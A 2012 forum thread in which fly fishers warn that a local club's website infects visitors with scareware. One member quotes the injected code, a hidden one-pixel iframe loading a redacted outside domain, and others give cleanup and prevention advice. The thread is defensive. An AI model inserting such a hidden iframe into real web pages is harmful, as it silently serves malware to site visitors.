NFR Avoid Puget Sound Fly Fishers site (MALWARE INFECTION)

Discussion in 'Fly Fishing Forum' started by DennisE, Jul 16, 2012.

  1. DennisE

    DennisE Topwater and tying.

    Joined:
    Mar 12, 2011
    Messages:
    360
    Likes Received:
    80
    Location:
    Tacoma, Washington
    I don't know how long it will be until it gets fixed, but I strongly advise NOT trying their site. Just opening their home page will get your system infected with "Live Security Platinum". Luckily I work in IT and was using my home system, so I was able to iradicate this "Scareware" and Trojan pest. It isn't an experience I would recommend, however. This happened to me twice in the last week (including today) so they are still infected.
    I sent them a message through this site a few days ago, but got no response. I'll be going to the meeting on Thursday so I'll bring it up there.
     
  2. Flyborg

    Flyborg Active Member

    Joined:
    Mar 17, 2006
    Messages:
    2,355
    Media:
    45
    Likes Received:
    629
    Location:
    Kalama, WA
    It's an iframe injection. The offensive piece of code is in the first line generated to the client on their home page:

    Code:
    <iframe src="http://*********.in/in.cgi?55764" width="1" height="1" frameborder="0"></iframe>
    (I blocked out the actual URL)

    Tell them to change their FTP passwords and alert their ISP that they've been hit with an iframe injection. They'll also need to edit any files with the offensive piece of code. Just a quick glance tells me it's probably just on their home page; if it's being generated dynamically they'll need to find the code that's doing it, but my guess is someone just tossed a static line in there.
     
  3. Davy

    Davy Active Member

    Joined:
    Mar 20, 2004
    Messages:
    2,031
    Media:
    119
    Likes Received:
    19
    Location:
    SIlverton, OR
    that's not fun
     
  4. Flyborg

    Flyborg Active Member

    Joined:
    Mar 17, 2006
    Messages:
    2,355
    Media:
    45
    Likes Received:
    629
    Location:
    Kalama, WA
    Left untended it'll get the site blacklisted from Google, so it could be worse :) Most of these site infections happen due to weak FTP passwords, as well as hosting software vulnerabilities. Keep your passwords strong and software up to date (especially wordpress!).
     
  5. fishingcheftim

    fishingcheftim Member

    Joined:
    Nov 19, 2010
    Messages:
    207
    Media:
    1
    Likes Received:
    9
    Location:
    Seattle, Wa
    I do not know enough about this tech stuff. Yet if they have a bug why would you not just call them and tell them?
     
  6. Whitey

    Whitey Active Member

    Joined:
    Apr 13, 2004
    Messages:
    994
    Media:
    1
    Likes Received:
    183
    Location:
    Far side of the moon
    note to self: when computer breaks, call flyborg.
     
  7. Pete Bridge

    Pete Bridge Member

    Joined:
    Sep 1, 2008
    Messages:
    191
    Likes Received:
    4
    Location:
    Lake Tapps, Wa
    Every time flyborg posts on a thread, I find myself clicking his avitar and laughing my ass off... Cant get over it.
     
  8. Westfork

    Westfork Member

    Joined:
    Apr 22, 2008
    Messages:
    109
    Likes Received:
    4
    Location:
    too far west
    Changing the FTP credentials might not help much. IFRAME malware most like occurs from SQL injection... sloppy coding, in other words.

    If the miscreant had FTP access, you'd find hundreds of redirect files.... and banners, popups, etc.

    Sanitize those Database queries or people talk about you on forums like this.
     

Share This Page